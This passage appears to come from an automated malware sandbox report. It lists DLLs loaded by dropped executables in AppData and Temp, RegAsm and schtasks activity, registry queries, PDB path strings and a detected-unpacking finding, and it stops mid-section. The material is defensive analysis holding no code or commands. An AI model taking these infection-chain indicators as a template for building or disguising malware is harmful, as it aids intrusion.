Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Section loaded: umpdc.dll

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: bUWKfj04aU.exe

Static file information: File size 1858560 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: bUWKfj04aU.exe

Static PE information: Raw size of icxmwjzd is bigger than: 0x100000 < 0x196c00

Source:	Binary string: C:\paz\81\soseleyayaj\kud.pdb source: ISetup8.exe, 00000023.00000003.2889135896.0000000004A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\pilace\bemelejedar-xuyu.pdb source: 4767d2e713f2021e8fe856e3ea638b58.exe, 00000021.00000000.2365060303.000000000041C000.00000002.00000001.01000000.0000001A.sdmp, fNXuIJPtZ25Cf8AC2M7nLhvu.exe.51.dr, aCC9Y3uZiPILOE7CPQBm3dqe.exe.51.dr
Source:	Binary string: C:\hisi.pdb source: ISetup8.exe, 00000023.00000000.2398337251.000000000041C000.00000002.00000001.01000000.0000001C.sdmp, ISetup8.exe, 00000023.00000003.3016845539.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, A47mXAfrsBDpojX2UlRMyVjb.exe.45.dr
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr
Source:	Binary string: 2C:\pilace\bemelejedar-xuyu.pdb source: 4767d2e713f2021e8fe856e3ea638b58.exe, 00000021.00000000.2365060303.000000000041C000.00000002.00000001.01000000.0000001A.sdmp, fNXuIJPtZ25Cf8AC2M7nLhvu.exe.51.dr, aCC9Y3uZiPILOE7CPQBm3dqe.exe.51.dr
Source:	Binary string: `C:\paz\81\soseleyayaj\kud.pdb source: ISetup8.exe, 00000023.00000003.2889135896.0000000004A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\tx2yxmt09kx\obj\Release\Croco.pdbt source: swiiiii.exe, 0000001B.00000002.2620190286.0000000002853000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb source: alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\tx2yxmt09kx\obj\Release\Croco.pdb source: swiiiii.exe, 0000001B.00000002.2620190286.0000000002853000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb) source: alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr
Source:	Binary string: C:\hisi.pdb source: ISetup8.exe, 00000023.00000000.2398337251.000000000041C000.00000002.00000001.01000000.0000001C.sdmp, ISetup8.exe, 00000023.00000003.3016845539.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, A47mXAfrsBDpojX2UlRMyVjb.exe.45.dr
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

